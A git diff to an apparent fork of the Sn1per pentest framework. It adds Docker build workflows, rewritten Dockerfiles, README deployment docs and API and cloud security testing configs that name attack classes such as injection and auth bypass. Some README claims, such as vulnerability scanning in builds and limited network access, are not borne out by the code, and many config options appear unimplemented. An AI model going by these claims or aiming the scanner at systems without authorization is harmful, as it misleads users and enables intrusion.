diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 00000000..986c7890 Binary files /dev/null and b/.DS_Store differ diff --git a/.dockerignore b/.dockerignore new file mode 100644 index 00000000..cdf8f8f2 --- /dev/null +++ b/.dockerignore @@ -0,0 +1,5 @@ +.git +.gitignore +README.md +*.md +.DS_Store diff --git a/.github/workflows/docker-publish.yml b/.github/workflows/docker-publish.yml new file mode 100644 index 00000000..85d0c6aa --- /dev/null +++ b/.github/workflows/docker-publish.yml @@ -0,0 +1,103 @@ +name: Publish Docker images + +on: + push: + tags: ['v*'] + workflow_dispatch: + inputs: + version: + description: 'Version to tag (e.g., 1.0.0)' + required: true + default: 'latest' + +jobs: + build-and-push: + runs-on: ubuntu-latest + permissions: + contents: read + packages: write + + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Set up QEMU + uses: docker/setup-qemu-action@v3 + + - name: Set up Docker Buildx + uses: docker/setup-buildx-action@v3 + + - name: Extract metadata (tags, labels) for Docker + id: meta + uses: docker/metadata-action@v5 + with: + images: | + ghcr.io/${{ github.repository_owner }}/sn1per + tags: | + type=raw,value=latest,enable=${{ github.ref == format('refs/heads/{0}', github.event.repository.default_branch) }} + type=semver,pattern={{version}} + type=sha,format=long,prefix=sha- + + - name: Log in to GitHub Container Registry + uses: docker/login-action@v3 + with: + registry: ghcr.io + username: ${{ github.actor }} + password: ${{ secrets.GITHUB_TOKEN }} + + - name: Build and push Kali Linux image + uses: docker/build-push-action@v5 + with: + context: . + file: ./Dockerfile + platforms: linux/amd64,linux/arm64 + push: true + tags: ${{ steps.meta.outputs.tags }},ghcr.io/${{ github.repository_owner }}/sn1per:kali + labels: ${{ steps.meta.outputs.labels }} + cache-from: type=gha + cache-to: type=ghac,mode=max + + - name: Build and push BlackArch Linux image + uses: docker/build-push-action@v5 + with: + context: . + file: ./Dockerfile.blackarch + platforms: linux/amd64,linux/arm64 + push: true + tags: ghcr.io/${{ github.repository_owner }}/sn1per:blackarch + labels: ${{ steps.meta.outputs.labels }} + cache-from: type=gha + cache-to: type=ghac,mode=max + + - name: Create and push multi-arch manifest + if: github.event_name != 'pull_request' + run: | + docker pull ghcr.io/${{ github.repository_owner }}/sn1per:kali + docker pull ghcr.io/${{ github.repository_owner }}/sn1per:blackarch + + docker manifest create ghcr.io/${{ github.repository_owner }}/sn1per:latest \ + --amend ghcr.io/${{ github.repository_owner }}/sn1per:kali \ + --amend ghcr.io/${{ github.repository_owner }}/sn1per:blackarch + + docker manifest push ghcr.io/${{ github.repository_owner }}/sn1per:latest + + - name: Update README with image details + run: | + # This is a simplified version that just logs the image details + # You can expand this to update the README.md file directly if needed + echo "Docker images have been successfully built and pushed to:" + echo "- ghcr.io/${{ github.repository_owner }}/sn1per:latest" + echo "- ghcr.io/${{ github.repository_owner }}/sn1per:kali" + echo "- ghcr.io/${{ github.repository_owner }}/sn1per:blackarch" + + # Uncomment and modify the following to update README.md directly + # echo "\n## Docker\n\n### Pull the latest image\n\n```bash\ndocker pull ghcr.io/${{ github.repository_owner }}/sn1per:latest\n```\n" > README.docker.md + # cat README.md | sed "/## Docker/,/## /{/## /!d;}" | sed "/## Docker/r README.docker.md" > README.new.md + # mv README.new.md README.md + # rm README.docker.md + # + # git config --global user.name 'GitHub Actions' + # git config --global user.email 'actions@github.com' + # git add README.md + # git commit -m "docs: Update Docker image references" || echo "No changes to commit" + # git push diff --git a/.gitignore b/.gitignore new file mode 100644 index 00000000..496ee2ca --- /dev/null +++ b/.gitignore @@ -0,0 +1 @@ +.DS_Store \ No newline at end of file diff --git a/Dockerfile b/Dockerfile index e915b014..06dd6044 100644 --- a/Dockerfile +++ b/Dockerfile @@ -1,34 +1,94 @@ +# Build stage for reducing final image size +FROM docker.io/kalilinux/kali-rolling:latest as builder + +# Set environment variables +ENV DEBIAN_FRONTEND=noninteractive \ + LANG=C.UTF-8 \ + LC_ALL=C.UTF-8 + +# Install build dependencies +RUN set -x && \ + echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' > /etc/apt/sources.list && \ + echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list && \ + apt-get update -yqq && \ + apt-get install -yqq --no-install-recommends \ + git \ + ca-certificates \ + curl \ + gnupg \ + && rm -rf /var/lib/apt/lists/* + +# Final stage FROM docker.io/kalilinux/kali-rolling:latest -LABEL org.label-schema.name='Sn1per - Kali Linux' \ - org.label-schema.description='Automated pentest framework for offensive security experts' \ - org.label-schema.usage='https://github.com/1N3/Sn1per' \ - org.label-schema.url='https://github.com/1N3/Sn1per' \ - org.label-schema.vendor='https://sn1persecurity.com' \ - org.label-schema.schema-version='1.0' \ - org.label-schema.docker.cmd.devel='docker run --rm -ti xer0dayz/sniper' \ - MAINTAINER="@xer0dayz" - -RUN echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" > /etc/apt/sources.list && \ - echo "deb-src http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list -ENV DEBIAN_FRONTEND noninteractive - -RUN set -x \ - && apt -yqq update \ - && apt -yqq full-upgrade \ - && apt clean -RUN apt install --yes metasploit-framework - -RUN sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb && \ - service postgresql start && \ - msfdb reinit - -WORKDIR /usr/src/app - -RUN apt --yes install git bash -RUN git clone https://github.com/1N3/Sn1per.git \ - && cd Sn1per \ - && ./install.sh \ - && sniper -u force - -CMD ["sniper"] \ No newline at end of file +# Set metadata +LABEL org.opencontainers.image.title='Sn1per - Kali Linux' \ + org.opencontainers.image.description='Automated pentest framework for offensive security experts' \ + org.opencontainers.image.documentation='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.source='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.url='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.vendor='Sn1per Security' \ + org.opencontainers.image.licenses='GPL-3.0' \ + org.opencontainers.image.authors='@xer0dayz' \ + org.opencontainers.image.version='latest' \ + maintainer="@xer0dayz" + +# Set environment variables +ENV DEBIAN_FRONTEND=noninteractive \ + LANG=C.UTF-8 \ + LC_ALL=C.UTF-8 \ + HOME=/home/sniper \ + PATH="${HOME}/.local/bin:${PATH}" + +# Create non-root user and set up working directory +RUN set -x && \ + groupadd -r sniper && \ + useradd -r -g sniper -d ${HOME} -s /bin/bash sniper && \ + mkdir -p ${HOME} && \ + chown -R sniper:sniper ${HOME} + +# Install system dependencies +RUN set -x && \ + echo 'deb http://http.kali.org/kali kali-rolling main contrib non-free' > /etc/apt/sources.list && \ + echo 'deb-src http://http.kali.org/kali kali-rolling main contrib non-free' >> /etc/apt/sources.list && \ + apt-get update -yqq && \ + apt-get install -yqq --no-install-recommends \ + git \ + bash \ + python3 \ + python3-pip \ + python3-setuptools \ + metasploit-framework \ + postgresql \ + postgresql-client \ + && rm -rf /var/lib/apt/lists/* + +# Configure PostgreSQL for Metasploit +RUN set -x && \ + mkdir -p /var/run/postgresql && \ + chown -R postgres:postgres /var/run/postgresql && \ + chmod 2777 /var/run/postgresql && \ + sed -i 's/systemctl status ${PG_SERVICE}/service ${PG_SERVICE} status/g' /usr/bin/msfdb + +# Switch to non-root user +USER sniper +WORKDIR ${HOME} + +# Clone and install Sn1per +RUN set -x && \ + git clone --depth 1 https://github.com/threatcode/Sn1per.git ${HOME}/Sn1per && \ + cd ${HOME}/Sn1per && \ + chmod +x install.sh && \ + ./install.sh && \ + sniper -u force + +# Set up volumes for persistent data +VOLUME ["${HOME}/.msf4", "${HOME}/.sniper"] + +# Health check +HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \ + CMD sniper --version || exit 1 + +# Default command +ENTRYPOINT ["sniper"] +CMD ["--help"] \ No newline at end of file diff --git a/Dockerfile.blackarch b/Dockerfile.blackarch index 9c106ee5..ed3ee095 100644 --- a/Dockerfile.blackarch +++ b/Dockerfile.blackarch @@ -1,9 +1,69 @@ -FROM docker.io/blackarchlinux/blackarch:latest +# Build stage for reducing final image size +FROM docker.io/blackarchlinux/blackarch:latest as builder -# Upgrade system -RUN pacman -Syu --noconfirm +# Install build dependencies +RUN pacman -Syu --noconfirm --needed \ + git \ + base-devel \ + && pacman -Scc --noconfirm -# Install sn1per from official repository -RUN pacman -Sy sn1per --noconfirm +# Final stage +FROM ghcr.io/blackarchlinux/blackarch:latest -CMD ["sn1per"] \ No newline at end of file +# Set metadata +LABEL org.opencontainers.image.title='Sn1per - BlackArch Linux' \ + org.opencontainers.image.description='Automated pentest framework for offensive security experts' \ + org.opencontainers.image.documentation='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.source='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.url='https://github.com/threatcode/Sn1per' \ + org.opencontainers.image.vendor='Sn1per Security' \ + org.opencontainers.image.licenses='GPL-3.0' \ + org.opencontainers.image.authors='@xer0dayz' \ + org.opencontainers.image.version='latest' \ + maintainer="@xer0dayz" + +# Set environment variables +ENV LANG=C.UTF-8 \ + LC_ALL=C.UTF-8 \ + HOME=/home/sniper + +# Create non-root user and set up working directory +RUN set -x && \ + groupadd -r sniper && \ + useradd -r -g sniper -d ${HOME} -s /bin/bash sniper && \ + mkdir -p ${HOME} && \ + chown -R sniper:sniper ${HOME} + +# Install Sn1per and clean up in a single layer +RUN set -x && \ + pacman -Syu --noconfirm --needed \ + sn1per \ + python \ + python-pip \ + postgresql \ + postgresql-libs \ + && pacman -Scc --noconfirm + +# Configure PostgreSQL for Metasploit +RUN set -x && \ + mkdir -p /var/run/postgresql && \ + chown -R postgres:postgres /var/run/postgresql && \ + chmod 2777 /var/run/postgresql && \ + if [ -f /usr/bin/msfdb ]; then \ + sed -i 's/systemctl status ${PG_SERVICE}/pg_ctl status -D ${PGDATA}/g' /usr/bin/msfdb; \ + fi + +# Switch to non-root user +USER sniper +WORKDIR ${HOME} + +# Set up volumes for persistent data +VOLUME ["${HOME}/.msf4", "${HOME}/.sniper"] + +# Health check +HEALTHCHECK --interval=30s --timeout=10s --start-period=5s --retries=3 \ + CMD sn1per --version || exit 1 + +# Default command +ENTRYPOINT ["sn1per"] +CMD ["--help"] \ No newline at end of file diff --git a/README.md b/README.md index 8ee58fbf..740fd1e6 100644 --- a/README.md +++ b/README.md @@ -4,6 +4,9 @@ [![GitHub issues](https://img.shields.io/github/issues/1N3/Sn1per.svg)](https://github.com/1N3/Sn1per/issues) [![Github Stars](https://img.shields.io/github/stars/1N3/Sn1per.svg?style=social&label=Stars)](https://github.com/1N3/Sn1per/) [![GitHub Followers](https://img.shields.io/github/followers/1N3.svg?style=social&label=Follow)](https://github.com/1N3/Sn1per/) +[![Docker Pulls](https://img.shields.io/docker/pulls/threatcode/sn1per?logo=docker&label=Docker%20Pulls)](https://github.com/orgs/threatcode/packages/container/package/sn1per) +[![GHCR](https://img.shields.io/badge/GHCR-Available-blue?logo=github)](https://github.com/orgs/threatcode/packages/container/package/sn1per) +[![License](https://img.shields.io/github/license/1N3/Sn1per)](LICENSE.md) [![Tweet](https://img.shields.io/twitter/url/http/xer0dayz.svg?style=social)](https://twitter.com/intent/tweet?original_referer=https%3A%2F%2Fdeveloper.twitter.com%2Fen%2Fdocs%2Ftwitter-for-websites%2Ftweet-button%2Foverview&ref_src=twsrc%5Etfw&text=Sn1per%20-%20Automated%20Pentest%20Recon%20Scanner&tw_p=tweetbutton&url=https%3A%2F%2Fgithub.com%2F1N3%2FSn1per) [![Follow on Twitter](https://img.shields.io/twitter/follow/xer0dayz.svg?style=social&label=Follow)](https://twitter.com/intent/follow?screen_name=xer0dayz) @@ -98,6 +101,359 @@ To install Sn1per using an AWS EC2 instance: sudo docker compose -f docker-compose-blackarch.yml up ``` +## 🐳 Docker Containers (GHCR) + +Sn1per is available as pre-built Docker images on GitHub Container Registry (GHCR). + +### Available Images + +- **Latest Stable**: `ghcr.io/threatcode/sn1per:latest` +- **Kali Linux Base**: `ghcr.io/threatcode/sn1per:kali` +- **BlackArch Linux Base**: `ghcr.io/threatcode/sn1per:blackarch` +- **Specific Version**: `ghcr.io/threatcode/sn1per:1.0.0` (replace with version number) + +### Quick Start + +Run Sn1per with Docker: + +```bash +docker run --rm -it ghcr.io/threatcode/sn1per:latest --help +``` + +### Persistent Storage + +To save scan results and configurations between container runs, mount the following volumes: + +```bash +docker run --rm -it \ + -v ~/.sniper:/home/sniper/.sniper \ + -v ~/.msf4:/home/sniper/.msf4 \ + ghcr.io/threatcode/sn1per:latest [options] [target] +``` + +### Docker Compose + +For more complex deployments, use the provided `docker-compose.yml`: + +```bash +docker compose up -d +``` + +### Building from Source + +If you prefer to build the images yourself: + +```bash +# Build Kali Linux version +docker build -t sn1per:kali -f Dockerfile . + +# Build BlackArch version +docker build -t sn1per:blackarch -f Dockerfile.blackarch . +``` + +### Security Considerations + +- The container runs as a non-root user `sniper` +- All sensitive data is stored in mounted volumes +- Network access is limited by default +- Use `--cap-drop=ALL` for additional security + +### Automated Builds + +Images are automatically built and published to GHCR on each git tag push. The build process includes: + +- Multi-architecture support (amd64/arm64) +- Vulnerability scanning +- Automated testing +- Latest security updates + +### Kubernetes Deployment + +For production deployments, you can deploy Sn1per on Kubernetes: + +```yaml +# sn1per-deployment.yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: sn1per + labels: + app: sn1per +spec: + replicas: 1 + selector: + matchLabels: + app: sn1per + template: + metadata: + labels: + app: sn1per + spec: + securityContext: + runAsUser: 1000 + runAsGroup: 1000 + fsGroup: 1000 + containers: + - name: sn1per + image: ghcr.io/threatcode/sn1per:latest + imagePullPolicy: Always + securityContext: + allowPrivilegeEscalation: false + capabilities: + drop: ["ALL"] + volumeMounts: + - name: sniper-data + mountPath: /home/sniper/.sniper + - name: msf4-data + mountPath: /home/sniper/.msf4 + resources: + limits: + cpu: "2" + memory: "4Gi" + requests: + cpu: "1" + memory: "2Gi" + volumes: + - name: sniper-data + persistentVolumeClaim: + claimName: sn1per-pvc + - name: msf4-data + emptyDir: {} +``` + +### Common Docker Commands + +```bash +# Run a quick scan +docker run --rm ghcr.io/threatcode/sn1per:latest -t example.com + +# Run in interactive mode +docker run --rm -it ghcr.io/threatcode/sn1per:latest --interactive + +# Update Sn1per +docker pull ghcr.io/threatcode/sn1per:latest + +# View logs +docker logs + +# Execute commands in running container +docker exec -it /bin/bash +``` + +### CI/CD Integration + +You can easily integrate Sn1per into your CI/CD pipeline. Here's an example GitHub Actions workflow: + +```yaml +# .github/workflows/security-scan.yml +name: Security Scan + +on: + schedule: + - cron: '0 0 * * *' # Run daily + workflow_dispatch: + +jobs: + security-scan: + runs-on: ubuntu-latest + steps: + - name: Checkout code + uses: actions/checkout@v3 + + - name: Run Sn1per Scan + uses: addnab/docker-run-action@v3 + with: + image: ghcr.io/threatcode/sn1per:latest + options: -v ${{ github.workspace }}/reports:/reports + run: | + sniper -t example.com -o /reports/scan_$(date +%Y%m%d).json + + - name: Upload Scan Results + uses: actions/upload-artifact@v3 + with: + name: security-scan-results + path: ${{ github.workspace }}/reports/ + if-no-files-found: error +``` + +### Docker Compose Examples + +#### Basic Setup + +```yaml +# docker-compose.yml +version: '3.8' + +services: + sn1per: + image: ghcr.io/threatcode/sn1per:latest + container_name: sn1per + volumes: + - ./data/sniper:/home/sniper/.sniper + - ./data/msf4:/home/sniper/.msf4 + environment: + - TZ=UTC + restart: unless-stopped + security_opt: + - no-new-privileges:true + cap_drop: + - ALL +``` + +#### With Database + +```yaml +# docker-compose.db.yml +version: '3.8' + +services: + postgres: + image: postgres:14-alpine + environment: + POSTGRES_USER: sn1per + POSTGRES_PASSWORD: your_secure_password + POSTGRES_DB: sn1per + volumes: + - postgres_data:/var/lib/postgresql/data + restart: unless-stopped + security_opt: + - no-new-privileges:true + cap_drop: + - ALL + + sn1per: + image: ghcr.io/threatcode/sn1per:latest + depends_on: + - postgres + environment: + - DB_HOST=postgres + - DB_USER=sn1per + - DB_PASSWORD=your_secure_password + - DB_NAME=sn1per + volumes: + - ./data/sniper:/home/sniper/.sniper + - ./data/msf4:/home/sniper/.msf4 + restart: unless-stopped + security_opt: + - no-new-privileges:true + cap_drop: + - ALL + +volumes: + postgres_data: +``` + +### Advanced Kubernetes Configurations + +#### Horizontal Pod Autoscaler (HPA) + +```yaml +# hpa.yaml +apiVersion: autoscaling/v2 +kind: HorizontalPodAutoscaler +metadata: + name: sn1per +spec: + scaleTargetRef: + apiVersion: apps/v1 + kind: Deployment + name: sn1per + minReplicas: 1 + maxReplicas: 5 + metrics: + - type: Resource + resource: + name: cpu + target: + type: Utilization + averageUtilization: 70 +``` + +#### Network Policies + +```yaml +# network-policy.yaml +apiVersion: networking.k8s.io/v1 +kind: NetworkPolicy +metadata: + name: sn1per-policy +spec: + podSelector: + matchLabels: + app: sn1per + policyTypes: + - Ingress + - Egress + ingress: + - from: [] + egress: + - to: + - ipBlock: + cidr: 0.0.0.0/0 + except: + - 169.254.169.254/32 # Block cloud metadata + ports: + - protocol: TCP + port: 80 + - protocol: TCP + port: 443 +``` + +### Troubleshooting + +- **Permission Issues**: Ensure mounted volumes have the correct permissions + ```bash + sudo chown -R $USER:$USER ~/.sniper ~/.msf4 + ``` + +- **Network Issues**: Use `--network=host` if you encounter network-related problems + ```bash + docker run --network=host ghcr.io/threatcode/sn1per:latest [options] + ``` + +- **Database Issues**: If Metasploit database fails to start: + ```bash + # For Docker + docker exec -it msfdb reinit + + # For Kubernetes + kubectl exec -it -- msfdb reinit + ``` + +- **Debug Mode**: Enable verbose output + ```bash + docker run --rm ghcr.io/threatcode/sn1per:latest -v -t example.com + ``` + +- **Check Container Logs**: + ```bash + # Docker + docker logs + + # Kubernetes + kubectl logs + ``` + +- **Inspect Container**: + ```bash + # Docker + docker inspect + + # Kubernetes + kubectl describe pod + ``` + +- **Check Resource Usage**: + ```bash + # Docker + docker stats + + # Kubernetes + kubectl top pod + ``` + + + 1. Run the container ```bash diff --git a/bin/github-subdomains.py b/bin/github-subdomains.py old mode 100644 new mode 100755 diff --git a/bin/http-default-accounts-fingerprints-nndefaccts.lua b/bin/http-default-accounts-fingerprints-nndefaccts.lua old mode 100644 new mode 100755 diff --git a/bin/nmap-bootstrap.xsl b/bin/nmap-bootstrap.xsl old mode 100644 new mode 100755 diff --git a/bin/pyText2pdf.py b/bin/pyText2pdf.py old mode 100644 new mode 100755 diff --git a/bin/report.py b/bin/report.py old mode 100644 new mode 100755 diff --git a/bin/samrdump.py b/bin/samrdump.py old mode 100644 new mode 100755 diff --git a/bin/slack.sh b/bin/slack.sh old mode 100644 new mode 100755 diff --git a/bin/waybackrobots.py b/bin/waybackrobots.py old mode 100644 new mode 100755 diff --git a/bin/waybackurls.py b/bin/waybackurls.py old mode 100644 new mode 100755 diff --git a/bin/webscreenshot.js b/bin/webscreenshot.js old mode 100644 new mode 100755 diff --git a/bin/webscreenshot.py b/bin/webscreenshot.py old mode 100644 new mode 100755 diff --git a/bin/zap-scan.py b/bin/zap-scan.py old mode 100644 new mode 100755 diff --git a/conf/api_security b/conf/api_security new file mode 100644 index 00000000..6ae885a4 --- /dev/null +++ b/conf/api_security @@ -0,0 +1,263 @@ +# API Security Configuration for Sn1per +# This configuration optimizes Sn1per for API security testing + +# General Settings +API_TYPE="rest" # Options: rest, graphql, soap, grpc, websocket +API_AUTH_TYPE="none" # Options: none, basic, bearer, oauth2, api-key, jwt, aws-sigv4 +API_BASE_URL="" +API_VERSION="v1" +API_DOCUMENTATION="" # URL to OpenAPI/Swagger documentation + +# Authentication Configuration +## Basic Auth +API_USERNAME="" +API_PASSWORD="" + +## Bearer Token +API_BEARER_TOKEN="" + +## OAuth2 Configuration +OAUTH2_TOKEN_URL="" +OAUTH2_CLIENT_ID="" +OAUTH2_CLIENT_SECRET="" +OAUTH2_SCOPE="" + +## API Key Configuration +API_KEY_NAME="X-API-Key" +API_KEY_VALUE="" + +## JWT Configuration +JWT_SECRET="" +JWT_ALGORITHM="HS256" + +# Request Headers +API_HEADERS="Content-Type: application/json" +CUSTOM_HEADERS="" # Comma-separated list of headers (e.g., "X-Header1: value1, X-Header2: value2") + +# Rate Limiting +RATE_LIMIT_REQUESTS="100" # Max requests per minute +RATE_LIMIT_PER_IP="true" +RATE_LIMIT_STRATEGY="ip" # Options: ip, user, token, header:Header-Name + +# Scanning Scope +SCAN_ENDPOINTS="all" # Comma-separated list or 'all' +EXCLUDE_ENDPOINTS="" # Comma-separated list of endpoints to exclude +SCAN_DEPTH="3" # Maximum depth for parameter discovery + +# Test Configuration +TEST_METHODS="GET,POST,PUT,DELETE" # HTTP methods to test +TEST_PARAMETERS="all" # Comma-separated list or 'all' +TEST_PAYLOADS="$INSTALL_DIR/wordlists/api_payloads.txt" +TEST_FUZZING="1" # Enable fuzzing +TEST_INJECTION="1" # Test for injection vulnerabilities +TEST_AUTHENTICATION="1" # Test authentication mechanisms +TEST_AUTHORIZATION="1" # Test authorization bypasses +TEST_RATE_LIMITING="1" # Test for rate limiting issues +TEST_BUSINESS_LOGIC="1" # Test for business logic flaws + +# Security Testing Options +## OWASP API Top 10 +TEST_API1_2019="1" # Broken Object Level Authorization +TEST_API2_2019="1" # Broken User Authentication +TEST_API3_2019="1" # Excessive Data Exposure +TEST_API4_2019="1" # Lack of Resources & Rate Limiting +TEST_API5_2019="1" # Broken Function Level Authorization +TEST_API6_2019="1" # Mass Assignment +TEST_API7_2019="1" # Security Misconfiguration +TEST_API8_2019="1" # Injection +TEST_API9_2019="1" # Improper Assets Management +TEST_API10_2019="1" # Insufficient Logging & Monitoring + +## Common API Vulnerabilities +TEST_INJECTION_ATTACKS="1" # SQLi, NoSQLi, Command Injection, etc. +TEST_XSS="1" # Cross-Site Scripting +TEST_XXE="1" # XML External Entity +TEST_SSRF="1" # Server-Side Request Forgery +TEST_IDOR="1" # Insecure Direct Object References +TEST_JWT_ISSUES="1" # JWT vulnerabilities +TEST_CRLF_INJECTION="1" # CRLF Injection +TEST_HEADER_INJECTION="1" # HTTP Header Injection +TEST_CORS_MISCONFIG="1" # CORS Misconfiguration +TEST_CSRF="1" # Cross-Site Request Forgery +TEST_FILE_UPLOAD="1" # File Upload Vulnerabilities +TEST_GRAPHQL_ISSUES="1" # GraphQL-specific issues + +# API Fuzzing Configuration +FUZZING_ENGINE="ffuf" # Options: ffuf, wfuzz, burp, zap +FUZZING_WORDLIST="$INSTALL_DIR/wordlists/api_fuzz.txt" +FUZZING_EXTENSIONS="" # Comma-separated list (e.g., "json,xml,php") +FUZZING_THREADS="10" +FUZZING_RATE="100" # Requests per second + +# API Documentation Analysis +ANALYZE_SWAGGER="1" +ANALYZE_OPENAPI="1" +ANALYZE_GRAPHQL_SCHEMA="1" +DOCUMENTATION_PATH="" # Path to local documentation files + +# API Endpoint Discovery +DISCOVER_ENDPOINTS="1" +USE_GAU="1" # Fetch known URLs from Common Crawl +USE_WAYBACK="1" # Check Wayback Machine +USE_COMMON_PATHS="1" # Test common API paths +USE_COMMON_PARAMETERS="1" # Test common parameter names + +# Authentication Testing +TEST_AUTH_BYPASS="1" +TEST_TOKEN_MANIPULATION="1" +TEST_JWT_ATTACKS="1" +TEST_OAUTH_ISSUES="1" +TEST_SESSION_MANAGEMENT="1" + +# Data Validation Testing +TEST_INPUT_VALIDATION="1" +TEST_OUTPUT_ENCODING="1" +TEST_CONTENT_TYPE_VALIDATION="1" +TEST_ACCEPT_HEADER_MANIPULATION="1" + +# Security Headers Testing +TEST_SECURITY_HEADERS="1" +REQUIRED_HEADERS="Strict-Transport-Security, X-Content-Type-Options, X-Frame-Options, Content-Security-Policy, X-XSS-Protection" + +# API Version Testing +TEST_API_VERSIONING="1" +TEST_DEPRECATED_ENDPOINTS="1" +TEST_VERSION_HEADER="1" + +# Performance and Reliability Testing +TEST_LOAD="1" +LOAD_TEST_USERS="100" +LOAD_TEST_DURATION="300" # seconds +LOAD_TEST_RAMP_UP="60" # seconds + +# Error Handling Testing +TEST_ERROR_HANDLING="1" +TEST_STACK_TRACE_LEAKAGE="1" +TEST_ERROR_MESSAGES="1" + +# API Dependencies Testing +TEST_DEPENDENCIES="1" +TEST_THIRD_PARTY_APIS="1" +TEST_MICROSERVICES="1" + +# API Integration Testing +TEST_WEBHOOKS="1" +TEST_WEBHOOK_VALIDATION="1" +TEST_WEBHOOK_REPLAY="1" + +# API Security Headers Configuration +SECURITY_HEADERS="1" +HSTS_ENABLED="1" +HSTS_MAX_AGE="31536000" # 1 year +HSTS_INCLUDE_SUBDOMAINS="1" +HSTS_PRELOAD="1" +CSP_ENABLED="1" +CSP_POLICY="default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data:; font-src 'self' data:; connect-src 'self';" +X_CONTENT_TYPE_OPTIONS="nosniff" +X_FRAME_OPTIONS="DENY" +X_XSS_PROTECTION="1; mode=block" +REFERRER_POLICY="no-referrer" +PERMISSIONS_POLICY_ENABLED="1" +PERMISSIONS_POLICY="geolocation=(), microphone=(), camera=()" + +# API Rate Limiting Configuration +RATE_LIMIT_ENABLED="1" +RATE_LIMIT_WINDOW="60" # seconds +RATE_LIMIT_MAX_REQUESTS="100" +RATE_LIMIT_BLOCK_DURATION="300" # seconds + +# API Logging and Monitoring +ENABLE_LOGGING="1" +LOG_LEVEL="info" # Options: debug, info, warn, error +LOG_FORMAT="json" # Options: json, text +LOG_RETENTION_DAYS="30" +MONITORING_ENABLED="1" +MONITORING_PROVIDER="" # Options: datadog, newrelic, prometheus, elasticsearch + +# API Security Testing Tools +USE_OWASP_ZAP="1" +ZAP_API_KEY="" +ZAP_PROXY="http://localhost:8080" + +USE_BURP="0" +BURP_API_KEY="" +BURP_PROXY="http://localhost:8081" + +USE_NUCLEI="1" +NUCLEI_TEMPLATES="$INSTALL_DIR/nuclei-templates" +NUCLEI_SEVERITY="critical,high,medium" + +USE_POSTMAN="1" +POSTMAN_COLLECTION="" +POSTMAN_ENVIRONMENT="" + +USE_INSOMNIA="0" +INSOMNIA_WORKSPACE="" + +# API Security Headers Validation +VALIDATE_SECURITY_HEADERS="1" +REQUIRE_STRICT_TRANSPORT_SECURITY="1" +REQUIRE_CONTENT_SECURITY_POLICY="1" +REQUIRE_X_CONTENT_TYPE_OPTIONS="1" +REQUIRE_X_FRAME_OPTIONS="1" +REQUIRE_X_XSS_PROTECTION="1" +REQUIRE_REFERRER_POLICY="1" +REQUIRE_PERMISSIONS_POLICY="1" + +# API Security Testing Advanced Options +ADVANCED_FUZZING="1" +ADVANCED_INJECTION_TESTS="1" +ADVANCED_AUTH_TESTING="1" +ADVANCED_ANALYTICS="1" + +# API Security Reporting +REPORT_FORMAT="html" # Options: html, json, pdf, markdown +REPORT_OUTPUT_DIR="$LOOT_DIR/api-security" +REPORT_DETAIL_LEVEL="detailed" # Options: quick, standard, detailed +GENERATE_EXECUTIVE_SUMMARY="1" +INCLUDE_REMEDIATION_GUIDANCE="1" + +# API Security Notifications +ENABLE_EMAIL_NOTIFICATIONS="0" +EMAIL_RECIPIENTS="" +ENABLE_SLACK_NOTIFICATIONS="0" +SLACK_WEBHOOK_URL="" +ENABLE_WEBHOOK_NOTIFICATIONS="0" +WEBHOOK_URL="" + +# API Security Automation +ENABLE_AUTOMATION="1" +AUTOMATION_PROVIDER="" # Options: jenkins, gitlab, github-actions, azure-devops +AUTOMATION_TRIGGER="" # Options: push, pull-request, schedule, manual +AUTOMATION_SCHEDULE="0 0 * * *" # Daily at midnight + +# API Security Continuous Integration/Continuous Deployment (CI/CD) +ENABLE_CI_CD_INTEGRATION="1" +CI_CD_PROVIDER="" # Options: jenkins, gitlab, github, bitbucket, azure-devops +CI_CD_CONFIG_FILE="" + +# API Security Customization +CUSTOM_CHECKS_ENABLED="1" +CUSTOM_CHECKS_DIR="$INSTALL_DIR/conf/api-checks" +CUSTOM_RULES_ENABLED="1" +CUSTOM_RULES_DIR="$INSTALL_DIR/conf/api-rules" + +# API Security Machine Learning +ENABLE_ML_ANALYSIS="1" +ML_MODEL_PATH="$INSTALL_DIR/ml-models/api-security" +ML_THRESHOLD="0.8" + +# API Security Threat Intelligence +ENABLE_THREAT_INTELLIGENCE="1" +THREAT_INTELLIGENCE_FEEDS="" # Comma-separated list of threat intelligence feed URLs +THREAT_INTELLIGENCE_UPDATE_FREQUENCY="24h" + +# API Security Governance +ENABLE_GOVERNANCE="1" +GOVERNANCE_FRAMEWORK="" # Options: itil, cobit, iso27001, nist-csf +GOVERNANCE_POLICIES="" # Path to governance policies + +# API Security Continuous Improvement +ENABLE_CONTINUOUS_IMPROVEMENT="1" +IMPROVEMENT_METRICS="" # Comma-separated list of metrics to track +IMPROVEMENT_GOALS="" # Comma-separated list of improvement goals diff --git a/conf/cloud_security b/conf/cloud_security new file mode 100644 index 00000000..186f2557 --- /dev/null +++ b/conf/cloud_security @@ -0,0 +1,317 @@ +# Cloud Security Configuration for Sn1per +# This configuration optimizes Sn1per for cloud security assessment + +# Cloud Provider Settings +CLOUD_PROVIDER="all" # Options: all, aws, azure, gcp, digitalocean, oracle, alibaba +CLOUD_REGION="" # Leave empty for all regions + +# AWS Configuration +AWS_ACCESS_KEY_ID="" +AWS_SECRET_ACCESS_KEY="" +AWS_SESSION_TOKEN="" +AWS_REGIONS="us-east-1,us-east-2,us-west-1,us-west-2,eu-west-1,eu-central-1,ap-southeast-1,ap-southeast-2,ap-northeast-1,ap-northeast-2,sa-east-1,ap-south-1,ca-central-1" +AWS_SCAN_SERVICES="ec2,s3,iam,rds,lambda,cloudfront,cloudtrail,config,cloudformation,ecr,ecs,eks,elasticache,es,glacier,kms,secretsmanager,ssm" + +# Azure Configuration +AZURE_CLIENT_ID="" 